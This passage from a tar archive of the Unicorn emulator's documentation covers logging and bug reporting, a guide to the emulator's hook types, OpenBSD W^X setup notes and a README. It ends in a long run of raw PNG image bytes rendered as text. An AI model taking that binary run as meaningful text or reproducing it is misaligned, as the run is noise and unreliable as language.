what is happening. However, the qemu logs are partially commented-out and incomplete, but give it a try. You might want to dig deeper - and add your own log messages where you expect or try to find the bug. To enable logs, you must recompile Unicorn with `-DUNICORN_LOGGING=yes` to cmake. Logs are written in different log levels, which might result into a very verbose logging if enabled. To control the log level information, two environment variables could be used. `UNICORN_LOG_LEVEL` and `UNICORN_LOG_DETAIL_LEVEL`. These environment variables are parsed into `uint32_t` values once, (due to performance reasons) so set these environment variables before you execute any line of Unicorn. Allowed are hexa-decimal, decimal and octal values, which fits into a buffer of 10 chars. (see stroul for details). To define how detailed and what should be logged, use the following environment variables: - `UNICORN_LOG_LEVEL`=\<32bit mask\> - The qemu bit mask what should be logged. - Use the value of `UINT32_MAX` to log everything. - If no bit is set in the mask, there will be no logging. - `UNICORN_LOG_DETAIL_LEVEL`=\<level\> - The level defines how the filename and line is constructed. - 0: no filename and no line is used. - 1: full filename including the leading path is used with line information. - 2: just the filename with line information. It might be a little confusing, as the file name can be used in several places. - If unsure or unwanted, leave this variable undefined or set it to 0. As an example to set up the environment for python correctly, see the example below. ```python import os os.environ['UNICORN_LOG_LEVEL'] = "0xFFFFFFFF" # verbose - print anything os.environ['UNICORN_LOG_DETAIL_LEVEL'] = "1" # full filename with line info ``` Please note that file names are statically compiled in and can reveal the paths of the file system used during compilation. ## My code does not do what I would expect - is this a bug? Please create an github issue and provide as much details as possible. - [ ] Simplified version of your script / source - Make sure that "no" external dependencies are needed. - E.g. remove additional use of capstone or CTF tools. - [ ] Used Unicorn git-hash commit - Make sure to exclude any changes of you made in unicorn. - Alternativily provide the repo link to your commit. - [ ] Detailed explaination what is expected - Try to verify if the instructions can be processed by qemu. - Dumping the registers of unicorn and qemu helps a lot. - [ ] Detailed explaination what is observed - Describe what's going on (and what you might think about it). - [ ] Output from your executed script - You might have additional log messages which could be helpful. - [ ] Output from the qemu-logs - Try to gather more informations by enabling the qemu logging. - [ ] More details - Attach more details to help reproduce the bug. - Like attaching a repo link to the CTF challenge containing the binary or source code. ## I'd like to make contributions, where do I start? See [milestones](https://github.com/unicorn-engine/unicorn/milestones) and [coding convention](https://github.com/unicorn-engine/unicorn/wiki/Coding-Convention ). Be sure to send pull requests for our **dev** branch only. ## Which qemu version is Unicorn based on? Prior to 2.0.0, Unicorn is based on qemu 2.2.1. After that, Unicorn is based on qemu 5.0.1. �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/docs/Hooks.md�������������������������������������������������������������������������0000664�0000000�0000000�00000016567�14675241067�0015560�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������## Introduction In general, all the hooks can be bound to a region of the emulated memory, so that they will only fire when that region is reached (or accessed). The hooks are also stored in a list, so the more hooks that you add, the more processing that is needed by the system to dispatch them. This can make your emulation slow down if you have a lot of hooks present. Some hooks can return a value, which if non-0 will abort execution. ## UC_HOOK_BLOCK *What is it?* Let's first deal with the `UC_HOOK_BLOCK` case. These hooks are called whenever the code execution starts within a 'basic block' in the emulated code. A 'basic block' is a sequence of instructions without any conditional branch or special processing instructions (or other events like the end of mapped memory) - a sequence that can be entirely emulated in (effectively) a linear path. The UC_HOOK_BLOCK is called with the address of the start of the block that's being executed and the size of that block (in bytes). Because the block hooks are only called on entry to a section of code which must be executed, you can guarantee the execution passes through all the instructions in the block. If some instructions are conditional, the effect of the instruction might be null - e.g. `ADDEQ r0, r0, r1` in ARM is a conditional add that only happens if the Z flag is set. The basic block might contain any number of these conditional instructions as the execution still passes through the instructions. *Why might you use it?* If you want a gross understanding of the code path, knowing where the system executed, you might use a block hook. Your hook might write diagnostics about where the code was at that time and the state of registers. This would give you a very clear picture of how the execution was passing through the system. Loops, for example, might result in the same block hook being fired repeatedly, as the code passes through the same code, ending in the conditional jump back to the start of the loop. If you were disassembling the code, you could perform the disassembly on each block for its entire range, rather than using a code hook. ## UC_HOOK_CODE *What is it?* The `UC_HOOK_CODE` is more fine-grained than the `UC_HOOK_BLOCK`. This occurs on every instruction that is executed, before it is executed. So whilst `UC_HOOK_BLOCK` is "I'm about to run this section of code", `UC_HOOK_CODE` is "I'm about to run this instruction". There being a lot of code hooks means that your hook will be called a lot. The hook is called (like the block hook) with the address of the code being executed, and its size. The size will only ever cover one instruction, however. *Why might you use it?* If you want to breakpoint the code at a particular place, this hook is a perfect way to do that. Calling `uc_emu_stop` will cause the emulation to stop at this point. You might also use it to trace the execution with a disassembly, in a similar way to the block hooks, above. Because you're executing at the instruction level, this means that you can read the registers as they are before the code is executed, which may be useful for your disassembly. If you want to inject behaviour you might use this hook to modify the registers - including modifying the program counter, to jump to a different place. ## UC_HOOK_MEM_READ, UC_HOOK_MEM_WRITE, UC_HOOK_READ_MEM_AFTER *What is it?* The `UC_HOOK_MEM_READ` and `UC_HOOK_MEM_WRITE` hooks are called whilst the emulator is executing instructions. When the code being emulated tries to read or write memory within the range, the hooks will be called. For `UC_HOOK_MEM_READ`, the hook is called with the address that is being read, and the size of the access. A 'value' is passed, but this operation occurs before the value has been read, so its content is indeterminate. For `UC_HOOK_MEM_WRITE`, the hook is called with the address that is being written, the size of the access and the value that was written to it. For `UC_HOOK_MEM_READ_AFTER`, the hook is called *after* the read has occurred. It is the same as `UC_HOOK_MEM_READ` except that the value has been populated. These hooks are not used if you directly access the memory using the Unicorn `mem_*` functions. *Why might you use it?* If you were providing watchpoints that track accesses to memory, you might use any of these 3 hooks. You could report all the registers and the program counter at the time of access - even reporting a stack backtrace if you knew the calling standard. You might use these `UC_HOOK_MEM_READ` and `UC_HOOK_MEM_WRITE` operations to fake memory mapped IO. If you had a memory mapped device that you wanted to expose to the system, you could use a `UC_HOOK_MEM_READ` hook to write a suitable value into memory for the memory mapped register being accessed. The execution of the instruction would then pick up the new value that you had written. Similarly, the `UC_HOOK_MEM_WRITE` could update your internal state with the register that had been written to the address. You might implement memory protection in a different manner than the standard Unicorn form. For example, you might check that processor mode and decide whether the memory is actually accessible or not to the code that is performing that access. This isn't usually an operation of the CPU (although some CPUs and MMUs do have this ability), but for diagnosing whether a given section of code should be *able* to access other memory this could be useful. ## UC_HOOK_MEM_FETCH *What is it?* The `UC_HOOK_MEM_FETCH` hook is not used. *Why might you use it?* You wouldn't. It's deprecated and will never be called. ## UC_HOOK_MEM_READ_UNMAPPED, UC_HOOK_MEM_WRITE_UNMAPPED, UC_HOOK_MEM_FETCH_UNMAPPED *What is it?* All 3 of these hooks are called when there is an access to a region for which there is no memory mapping. The `UC_HOOK_MEM_READ_UNMAPPED` hooks is called when the code tries to read an unmapped memory region. The `UC_HOOK_MEM_WRITE_UNMAPPED` hooks is called when the code tries to write to an unmapped memory region. The `UC_HOOK_MEM_FETCH_UNMAPPED` hooks is called when the emulator needs to read an unmapped memory region to fetch code to execute. In all cases, you can either map the page in with the `uc_mem_map*` function or return non-0 to abort execution. *Why might you use it?* You might use these for dynamic memory mapping, only mapping in the memory when it is needed - which could be useful for a virtual-memory type system. You might use it for trapping bad accesses at the time that they happen (although the usual abort that you would get will also give you this information). ## UC_HOOK_MEM_READ_PROT, UC_HOOK_MEM_WRITE_PROT, UC_HOOK_MEM_FETCH_PROT *What is it?* All 3 of these hooks are called when there is an access to a region for which there is a memory mapping but the memory was mapped with one of the `UC_PROT_*` restrictions. The `UC_HOOK_MEM_READ_PROT` hooks is called when the code tries to read a region that isn't allowed to be read. The `UC_HOOK_MEM_WRITE_PROT` hooks is called when the code tries to write to a region that isn't allowed to be written. The `UC_HOOK_MEM_FETCH_PROT` hooks is called when the emulator needs to read an instruction from a region that isn't allowed to execute. In all cases you can either map the page in with the `uc_mem_protect*` function or return non-0 to abort execution. *Why might you use it?* You might change the protection level of the region to allow the memory to be accessed, or you might return non-0 to abort execution.�����������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/docs/OPENBSD-NOTES.md�����������������������������������������������������������������0000664�0000000�0000000�00000004325�14675241067�0016442�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������## Circumventing OpenBSD 6.0's W^X Protections OpenBSD 6.0 and above enforces data-execution prevention (DEP or W^X) by default, preventing memory from being mapped as simultaneously writeable and executable (i.e., W|X). This causes problems for Unicorn, if left in place. If you're seeing errors like the following: ``` /home/git/unicorn >> ./sample_arm Emulate ARM code zsh: abort (core dumped) ./sample_arm ``` then W^X is likely the culprit. If we run it again with ktrace and look at the output with kdump, we see that this is indeed the issue: ``` 82192 sample_arm CALL mmap(0,0x800000,0x7<PROT_READ|PROT_WRITE|PROT_EXEC>,0x1002<MAP_PRIVATE|MAP_ANON>,-1,0) 82192 sample_arm PSIG SIGABRT SIG_DFL 82192 sample_arm NAMI "sample_arm.core" ``` Right now, we're in the /home filesystem. Let's look at its mount options in /etc/fstab: ``` 1234abcdcafef00d.g /home ffs rw,nodev,nosuid 1 2 ``` If we edit the options to include ```wxallowed```, appending this after nosuid, for example, then we're golden: ``` 1234abcdcafef00d.g /home ffs rw,nodev,nosuid,wxallowed 1 2 ``` Note that this *does* diminish the security of your filesystem somewhat, and so if you're particularly particular about such things, we recommend setting up a dedicated filesystem for any activities that require ```(W|X)```, such as unicorn development and testing. In order for these changes to take effect, you will need to reboot. _Time passes..._ Let's try this again. There's no need to recompile unicorn or the samples, as (W^X) is strictly a runtime issue. First, we double check to see if /home has been mounted with wxallowed: ``` /home >> mount | grep home /dev/sd3g on /home type ffs (local, nodev, nosuid, wxallowed) ``` Okay, now let's try running that sample again... ``` /home/git/unicorn/samples >> ./sample_arm Emulate ARM code >>> Tracing basic block at 0x10000, block size = 0x8 >>> Tracing instruction at 0x10000, instruction size = 0x4 >>> Emulation done. Below is the CPU context >>> R0 = 0x37 >>> R1 = 0x3456 ========================== Emulate THUMB code >>> Tracing basic block at 0x10000, block size = 0x2 >>> Tracing instruction at 0x10000, instruction size = 0x2 >>> Emulation done. Below is the CPU context >>> SP = 0x1228 ``` works fine. �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/docs/README.md������������������������������������������������������������������������0000664�0000000�0000000�00000000557�14675241067�0015422�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������Documention of Unicorn engine. * How to compile & install Unicorn. http://unicorn-engine.org/docs/ * Tutorial on programming with C & Python languages. http://unicorn-engine.org/docs/tutorial.html * Compare Unicorn & QEMU http://unicorn-engine.org/docs/beyond_qemu.html * Uncorn-Engine Documentation https://github.com/kabeor/Unicorn-Engine-Documentation �������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/docs/Unicorn_Engine_Documentation/����������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0021727�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/docs/unicorn-logo-text.png������������������������������������������������������������0000664�0000000�0000000�00000140611�14675241067�0020242�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������PNG  ��� IHDR���� ���?zj���gAMA�� a��� cHRM��z&���������u0��`��:��pQ<���bKGD������tIME , K=���IDATxuxW9#1$XpiPFB兺;uwwNJ.5@>~? Y;z/Lvf3@r#R����@rY��������������R�;����@ @p����H�����)�����  �����w������������R�;����@ @p����H�����)�����  �����w������������R�;����@ @p����H�����)�����  �����w������������R�;����@ @p����H�����)�����  �����w������������R�;����@ @p����H�����)�����  �����w������������R�;����@ @p����H�����)�����  �����w������������R�;����@ @p����H�����)�����  �����w������������R�;����@ @p����H�����)�����  �����w������������R�;����@ @p����H�����)�����  �����w������������R�;����@ @p����H�����)�����  �����w������������R�;����@ @p����H�����)�����  �����w������������R�;����@ @p����H�����)�����  �����w������������R�;����@ @p����H�����)�����  �����w������������R�;����@ @p����H�����)�����  �����w������������R�;����@ @p����H��)Ӥ<{nMu5��͜Ⱥ���HI4T,2gvɼͺ(� ��4]}m2UU㨮{XW�М!�@PXk7¢ʊQRʺ4�f��ˬ ~UAURw�Bp�F1J/4u/Q]7p 2�-*��f{qgF,,�W��pFI5fU�9Cp�1^S;˨,e�h�t=giB Y �М!�N~ g| v�9ê2��0}`q֍K2 m=/zmg.de]�D��@'_;QQIelko騪jר+Vi[; =T,GEpHu���y3t =bko꛶(*K{⿿ ue] �D ��3?JC&eT-Q-׶n7ʩ%px~EDX �Bp�9e+z OM$P/ Omb?<2vH�;��QX4jZSOb)a]~`sS̚_#d<9A`]/�;��b63)5*+9J9BX7R.KsY[wLbn'53@��2+Yp{J4yں f A^,~XӏI@3��ҷ穫F|YSc"ǐQV.3Fa1UU҃z1'tf]8�;��*|Y[L() bݔg΂ӌҲF}"<?>+u���7R]*+PȬfݎFUUY;yLȳ2=wu � ^�o5wM4Wfb~j$(𯓩,7TMk7;u� �8umC>0h0H\.I1T¿M=?qN'Ϻ�wX% ��8㌪je\X&Qr:Z"dm<o:$Z��qYWou?`VU ڳnPy1#njԶl'OU׮7M L%V>�-;��p"JgJƺIIͬRʲP3LbI>#um4RRWQWַQEt>=qo&v�@ ��GEEw;q3n> **49x§3RԬԋ-۴]ͪj3TZAN>÷n%i͙!6]u-G~�h��ѰK^XĠ AgԚuufk4Tj:SG=q麶=_],Z,]A |qIǐ?}]cF&x�H��QE1JJcu5uN7++cO,-3k̊ ʬY uPH[AP]Xۺ-vq:ub.)� ;��p0k"0(Tw; "m{Q(0kki(ܘRDòtYxƟeѿ)=nc=xW�I ��8bYUe)mpC]A߼E۞(@ױ{Իg\x<mpY[Ş]7`?lk!�xiTטsFeQVKQY6oQWmwy; GOX~2o<sxYSkZ?u-!T3�w�R6Xx hQT_,^o bRe#ǥZS3gVձD^{.;@ Bp�HVAC!zi0DU t:IG Gc7<�j?a'aG|mhsg#G71|zzl[ʙЏhkd`^BnuVj �$(4ˍ=%zQYZfTVP**(T9]("g8bBb.b!'Q4=ĬiM;(O9]/;c vÐg aYYRG6ˑCc� !�0ch7i[E2 4tQ vq8x[Y[4z1];Ť4ˎm㌲ I=~Զ7%+.ywQR_QF 8yBv?�Hq��eeUFaQVNC!jQ?Ji(LCaZ/إ.^J.}{#+}MNUcʪ*Rݫ1/6/"ϙD1a;ˑCb<ϓWf OjD1:h/!{}SNY�Hi��`VUk[W* 4PEUVט5mIS,Îp\xc[>zF- ﬛nC8.<C~W\^#5W[(Ŭnjtn_(g,�@3�Gϯ̛ZYkSY>iJ>KY2pN9i(,,.wqs\tB8&thvʉfunqznCc>H!ws5|Fz\�:w�أ6<m*J,A7iR_YX]z1n+H~(*a 3ei(xxv/ v]wh+Wk4xwΝAv!crb; չjZ=Y[}!YO<H#�f� (Lʲa`Qfi5 B ˳f+:r>3NhBe?Hp6m13_xeȠ`E%ߧ蛷R](??" mVxx<j ChrUzQZljs:aKT�h w�Cpau4(RxG]umGry;ǙǷi}-ށUd?ﬦ*v}x4Ͽ? (qoۮo۾_#ɿ1L�\!�D>#C:0]6=,]iTTPr\7:7]{%X[Fq%@@Ğ=̙F-kt& ԕ_|,Y?u8A<pex5�)B��`jk)KWh7; hj곟s{½u{OKgN;n*x{̷K/Ğ=RJZuз?* ǣe?L}w~�h�j*W@3O/,Jxː ;8~BPY=rocWQ<4y͕|YS^{ex4ߊuu<qq �4c��cN>()e]K}DԿçyL\w3="g6l }<wA\!cw&�@�hw>P`F$#.pRg߮weμڻ@ Vw!GO9@/~C)~�zW\:Nļ2�O�e:v, m[Zv6oU VС?+E9+V.st]?Im+korZ5x�4oq�`0|_ ~Y{|G*_̚[RWB鯼`v_ҷmg:(,{[e?5, �$��PU>xI aCyY)sq/ n=z¢Ym h4p N?5Ce��!`1\]Sº̚e|ۄݍmh)]︱s1?t:.}#^� �ږ<=/u)AeRcwr999URawsgdVY {J%qR{pt=�-��$e}G|fiQRJ#͉СأfGr>!sJ{ib%TUե+sc" 8.81JD?8�h1�Ĭշi[W軋;m'&t-wCʲihlv}]:;v�!w�2rMB*v{}q46@HߺQRߨU,x(Y]+~g��;�@u^=/_]F[(,4JM3Mu5S<o:qhuUA N'qYYBNbRBvw6 =%meʲ_)ttsVY���`zaPYmܬ0k̓<N$(h{<MӤ޽ľ.N683 ʬTs=ƞ?DǸnrNX�Z w�Q_۞owEz4b]m|F>[hՊxܼMnbIbVUi|cO 'u ڶa�hY�2 <zf0DeLSs<Oxq8jU502d;!v �@ �G׍j֬2+*=Fa,-B*zKC6ثW_q ��$.��)]7+r(0Jά1M&49`]+0# vȣ� !@3GIu4霮SM3k*Ҭ2*̲2TQ,SYQ�G$1RM69BX�-;�8w%Ti8D!>Y[gՙu޽u4/ؽ;m'1�  QmZwu@B︅oӚu-��T�Hy4>Dx4օ@ b;oq*R���۵Ymv]6Z��CpfB۸{_=@=R>q?u!�� CpCY;au!bxz ;o;簮�YQ/=񌾻u!2>c8.u!���͍ ں dGN)':]+ú�CCpfH߱?SuS&P&J%$�Qy~BrC4b"Otp4p֥��4;�4gʼo~˺[ 5+X< 9W^f>#u-��M�͜YQcfߴM[Xrt^ucֵ4OOp^e �;�mʬԷ籮�uB_�jU^nź�!@Am2oh|e[u\zuw߯mƺfm֑#W_a=hֵ��D�Z0ʵ[ԥ˵qv&uQo7~@ *+X�-w�hr`ty_ Vee|.vW=X?H}y<k�Ⱥ��Pjՙ^ h0H2UU*˜PM giR(8uNөUڶfm$y/v{ xwvﻓX�;� v; BhLaΤ59(&g#q?riRJ9`;HyնNVWO6_;!sNyg'ON֏��w�HjTͪj}{~aQXd,SM<vG2b붛~*r3*W8#$a5JJ?bG7��R;�$#R]NۼE[F˧iTS:gdx&G\.uJyƟih(}Y};iT=lowy�@jCpA) j6{JºpqtX(Pu9-YY}♌7_r:%薢syݝ}f;.~�h~5Ӥo O!OnTT�ư:qE!F/Xӂh7_{+'Þ;=Y ː0�Y��-a@@>U/~QR50 <"6g_'SYf]Q457܁yX*ˁ>~?@ C;�az}ʜy~VWnI?xyuRǙu)XLJX;&1:.mG?u U�7QwU-+sԯ8Q8N3(úʲ7sN/jn=�*w�Hާ_uJ ڴ8*,Mэu6n n;<(+1G@d A_rgXŒuQx8=/_]˺D)|v6%9ÈxO#}tyn � ;�ğiWz?DNH6fs^7V]Ҭe]T ~Y;o{tBe96kSسuqxǬ&@3�e^eֵ0fue0sYWxBŎd(@ Qjwo }C�4�GFW}O<kVU1bGGwvk6.*U]]{^yu|f&i\2ǟi[%@3�m}7Y8 ;2~[@uQ)w8BLOʻn<еYSQԮw:g [qhbuSMc� e!@\(x'<,\̺@S( sɺT&a~߬811j>mRy"%QF-Ï8N@0 �R;�Ğ</#Oj.$YzZ ߚ55z}QJ,ek_4*}3}&_,}mbDa;dNh(S &@Bp=QXĺ$b;dc~\EEb9T0k&nG{}R݋](cf(U׬SW&p9gYǩkׅ~5O�R;�Ē߳/{JXD QÈ$sD۰ [Dmv}:qRq<ЩmRfu<svbeێ;80B_}k%@JBpQ.=QVκb9rثǿTߵc,< !{ǺO;$+nj3`x_ C_~�)Id]��4ڦ-Ǟ6JJzb; 9lMk>=8D8 (-3v۶M#֬2v" yR]`g_q:R}fm-  >\[4<m>=D�H�fU; ڋ={HI}8f,}GSY%چM.[xؾFI)>)I'RJ1feei8LlL<u^mf뉣P4Z眥Yq$iO?@@phQM=bU_%.u0iaҠbrX,(\|\n7*f~:=N=b)ʺRJ&v;Wq@$ٝڭ#̪jReBm<F�H�GN˰#%>Ph߮iaFl6I#;;HzsFHT7lqHyRJ\&Z !YSKU5&WIɱ ?R684鯾)@@p(>dߞoC{뉣/vL/%Bi=zԿ_~1LMׇ QTLL-q/~wu+ӏh)tzs%$z1{;gcf4 `U�Q^9vq'O<L nw\R>4wﺍhоСarfD-[i @8Bq9' HCtx[&;"d�z Rx]mv uW?WhӺ^syuFuMm/RKzjk$#73҅N-*Iv^96cv~wB9o2bxIqW*ZG@Bpɳf~m3Nsvإ3Jz<cYUе ߺվG뺚]>Y[gܥ宕I,!3S42lԷ߶ etx{~\ߖwh{DLOFbN?592ycG&�w�YQ5kg>a%4RW ~ X?"DXYWǥB)9'43 ̘GwNNnWO!_&7ge6aϦX/ 'ofjZˑC>S�HR�dTU}&tysJ~¬J}|F×Akh/anQDmieƮTU8[x@r%^㱝|B7Owa2�?LN&ӷm[ee1ejuuo ~MvVYB�g`D#X-$÷nͷiQz&bYu2mF �;�4|zdVB(6nf8H33<Q'|iLأ.]yl,=�Cp&:u8.ǟ6뼬|~]Ӓm雃 n7a]EBF—ڴ `k7�I�(ScVU_z5G$6[CY؁u eK%nm[h)�I�RQ^{~b臟Y(nohtiO/bEby?`B*Ay#_l˛�s�rsShkIIG't(*Ɛl<g^o*{v:��)(*=|x4օ4!@;,1!ةc }D+g27%w:p1 ˬ�$�-Y i 'Α+gepKU]:@l6ˑCT.з~�DR�Xz.ȳ.isB`q ϋ]**RXз?s'BNB61J˔e+Rh63�;�$/}{ѧXF7af7ߦu & #!_yFY9��bU݄G49 tʞoZhߎi[_{ˬIxG߯~ 6h6~�, nں iR]0qʺCڴesHCW都%f vB$icTUե+h%4�!@r~﹉^2 @Jz vIoEb[ ͈#]~MIܩAeJcO �I�ty-wƬ2,H[eEbQEH>+8bWoIum˶KvwPߑ=@L%�h!=%'>e2\ɄoevDCD?QB~*qƧ=}%$qG CYX?�`�3+*o[=?5 x fzإQ^mF 'Obiiq<7<Ͽ{;Y^=]`~�;�A5M۰U^xkh6gIN?UY3(/EP/ЩHM^{ͷnͺ`w?B.4OfM @R�@BP,WWR/p9V6]7^GAmæfԘ|zDžlrqL 3RHОOOc; Iu^koeJ\BvA)5v|V��E2e j۶Vsb.~Gx(i{5FudbN'cOILD bN'u+ԥ˃ge]r:jk�-;�ėkɿصq|yμ\Ь6K?NNSGn 9B6zօ$_[a9jXϧ ݻ+=|�Ƹ@|Yn;T}d18Ϋԥ\1TUYأ[2/,C j7<BQ-i߼`;qNUN|ꊕ��K�_p<.w+ˮ1d rFY,w64h q8X7 u." >K]2ӯķiͻxFY@JCpDNٌu^?zH};r%I<qt=qFIyk lR~|?* oo ֖tqu+!Ǎr}֤� @##CE[^ߡة2J˩,Pe(_r1#9֮7+*cxe(-/LbI}; 3QEw!Kk[}Nu%M|=1Kek7%u:��6 шj~e@3rҬ23ANӨs7RJN Hv4R}waٗ\k8B1ި6 G% DžMO#oj݆Q]#9TY* ʒ2g<m}y12.kM.6oI@ph%r .Щc#u* tRD8,P-g ,zH!Ǚu^mͺ70M[,W,Ïݮ]fѬLNi9fOz.u%XGgzԓ hG(*۲n:�1�D8|zgd0s}/{e(WT$VSǼz^~o6vҬRҠI[-+z^~/qem-._a�hQ 5`P6<m _ra;㱰cg QIQVf{~9|u]I'1ЦpY8-@� I @ P,>d݄$s⽿᰺n}<*7ks/ˑCb?"F xϾG# ;55ߏ$c>+7%= �hQ i|Si(+K[ kZx5az.-CQQoD 8`]ZQ.V,5ylQnC~V�q�I>`oi4lgN]V; ?N,ti֛;k1z1t~N[#.r65֮O΅D  ͭ>koi[cD^|vB 2>uo;œ|"Iǒ&Q殕Kx8@߶KsL�\]={Ie"*h8~!]0R|,)'3 z:Nzh({j8A/en4�0�I$/u"7yZ{rmm@ zQMSW?:.vɬK:ڦߧr</deq Z w�H ΂%m˶x%NevL(o%4e{d=׻GLYbawGكuuɅ*JxҴ {z Cہ=�Z w�`0B_WsiM_]Y[*v'0+* %vyAf]`rѶn n;xvj6v:,�w�`IQ{^6 PcHdVpte% -B,G7<}V|#{zH bq4bb�H4w�`0B?\s ?c@EÔ^ ǿ�JÿO6i?笄=& Yx<п#M[sbr)@_Ջ��7|T/Uw'5J"طбþŘ^ob9; _HԓRyt}KCr Ӟ{8L4 Oez}_~2ij[R*�$3w�H(ij4ZRg`0APۆׅlq%9Pߵ;<y* (:.<?gv56l+ZeJ Y� �4RcO`_<KgβaJzy_;N$vb~E]vi. w [(͋~ b(R}vmDCpDaYk^͵7~9~{(ݺԟRi,!OFIDžΫ.OKC{J!m? 8N]VY4ʋ8yQX;@�h =Wި.=oJt!'ވ'􍄞:%㏵ JeԥC?|d]v/zحk jVTKGX-vn � բ@Ѱ̝_{=O`4>#u\¢ /0iX ~2g^Ac̥c}^ .]G6U69wbP�H(w�xOjo[[,脶m(;HD'4ʃ}E{4't04]lN9w`zm4W -UT}w!@B!@QEgϭ;0Y:@a~V6Paf+vSR}N3/68Fc3}#)va]xQYVW(H} kQT̺�P�c}r5ZZe? UU[@`/Ya&ϧ1%myRAzR/k,Cw!uu!?8C ԬL6�%��aY UkiIGq:$Į-qlE_]]8V.f>@?gsd}X dWh67%fMm^Sh28K,4ZKi��~ :k9 rzcxw99-B3cn]{t\qTU=Vnw~3'6ж, vyFEYQiTV5CSW_p.Pj@phѰ<5wڦ-k9R!*w9 7rodJq9C]D=:xF8B\epn]n]NY[g%FYYUM3d&H>ykcF'!mzcn~?TpuufM ucP�Hw�*7շs*2~|V&qX$W_W\RL i7ej;!;n9…B:i`g(z^uhfY[ǺMyB) G5ͬeJ�Hw�QX7y `ZgeryJ2I+/N7մǟ~;\۽o\%YaN?E߲U3_(úcڦͶ3N!;G9u# q �4~wBS)sHBvBx4G<R1#vhGC; z!=ޟڋ<q7 u qi%joj[k"bƣq>=u8!-Ry_u{HY4޷"e=wd~c̥`)&1JJ#C!nfE%&@ @ci7{|;aylӗKDA:l�L3e`k"k@ښuއ~MV'64hge;4M?(+C>I4;@ˁ1�ph΂s{R:%P3pr:̪j5;w{xq%چMISFa׵!ozH_i?B[h� 2CXC[Ԭ ա�F/{7(,JqY[GCvYWi۶^zmawsث'ߧx̴ܑ}F;s$ά5iĤdK a'З{JRo8{C̚»G(U, 9Oߦ50[x;a(w$Dhyu_~b;$ hD|s Q@p2 e[﮹7?EIa$jCi@n$O?|X?yU?s/~\}4`NE8 }si/>#tb�yp6,0AMAp�80?U]<;YʪVREiKb#.8L nv)P3YQX{ŚnR-I_'v;.<?ˉ10>Ltʡ_f˺� M �3 3RWV-giTV(3k܉myd9̚o4qGgR x`QWf]c麺|emZY;\73)y^윓ҳQ^{[g>7C"xE56fi^w塔j(ڦ-ꊕmi<AufY9vKj ;H|2}Ͻ~2xоٝ<p];v _h;$c#Xei~Y%OѨA?UUek@0Tej "eђkoU]xy57?L[v߯F_u ;u}O=m^ԯ{}|z̬ K=ie ;3> EС_f {�z)JsJF.muJuq, {CLʳ('~Ҟ|ޮO0+[R>П>R[qF\.!'MFqY@phv(5kjی]zQ(*dz\smϧ|H-G od]ԥ}O<إǝcǘ?K9cFKB۴&v;.v"vTVUa6c�wf0_s¢dJq8NČB7o1*v\xwæz̝8cN&/ l"Ib ^GhMv6 ;Rh&4j)2yC�L 4;h~e4R׬6lwy;̪*K9r.'q9Ů]M[SHݍr`أ[à {Իu>B<LO Y]#5u%ge&Blt&B6O9;GF%rJ@ˁlz#8w ;MRzoOP%N'gBNRB|l}{V.s"{ չ9Тb.О<#Rw<'1Au 64?Jt[ڵշ%-Dv62\0� E;爝sqz.hQQaVW5u2j%i>-Ze]:]šzq9ݏ&&xY e\-7p5qA|Bx4m݆DVը-* R>۾]ړqM-8R߾e`=z㲋#eNiLF-+� w?lo͊J(+3kLϬ4kj:/ ,SU֏Q<D8X,'t>3<|VBBv[MaϿO|6&Ĕ^Kߞg9r聖r:9.зyk..]}ɴGAg{Dw*7 :2rD s{tswжMW0ڸ~6;�"mZmZKO) `TVnO8A < وJl6pcػFOoԾWx I3NU͗g'qmͺ<2a8AӞzz~nge :0YRrP_eK-GHeV4r M�W�_[pz{za2Qy@/3ҝ^mdW* m۽?y>s2{Z/ź mZ󭲘ܚ\Λi[55qaJFu]79<+Z �x;b9lN˰#9 jBagC_A#<?$vd[$KĄ?Ȼ(y͕i?mj8fm]c_d ~�4W? >22MyC-5qiDEo3z1va]]R= O{}? ǧ{ꭵ@Q/;�Z'`]�/Nא9v1B샼w9mKwWyUmwXϧ=&v{toL\Fq4da19baGHuuƞh/Gn9JÉ%FY<mQZژ,N91��;�$HxT˯:/Bsi;夃JОM޵;(wk׋9N.;ԧqYUͺ/@ۇ}C:b4proIvK==sߝ.1wbX^[2Qex^:lQ|� &@"(_}Ӭ O~ػ^$1;B?ʺރ֮{1cW]ei>}YmFqq(k<CޡupJ]Na1jg4 i|f.[A;u2Ǝq'$ _;�ĝvWbօGǟO|/#=%ʒeK>k293ާW.g]G,>úL>3Sѝ* U^/  /D\Nv.Y95VCbĬ0lB,O��KY{H3O]2숃oyth07mvqػW|N9FNEed\'pFyEւ8bgP�$@5WTW.y_|ݘ>Ӟ|TОuɇb! 8:vH{E0ٲ$=`PG#PY6{�3\a� �ⅪjO䙳wȦJ,\>15C|f&ͬvmwk[qgdxyu {gqO&fMQVW@p4<yZw?RBl'ԣ)9]W,;.'c5МlLfMQ҈ "<qe,�$!w� uk{ Blg#)5}ϾT{UTӜWI{lTndYR&FIyf]2�$;�ĞQZxCu!E5-deFvi<ƷnźR/wk2ieIVGewD;K@2Cp{e"օ4Y[x}~j;.h xko OC!wgAU ɳ{Ңj {nM�w�)J _~˺Hk~ʍ촎:.㍗. yuw_7}붴vz#*+AN9Iì5vn <3YW � �d) ~ XYFI_~(m_z(+-6<cV͍_zvG{vOD_i6Xf]ޤ1f2�-;�Ďa~=Wm?$ @]]㲋ɺ~M͘kjM#Wa Y]c7z-Hxo ��bF]!׬QV{)ssоg^~нtX^f02`z߄ Z�3˺m=B'g ĺH[8"8 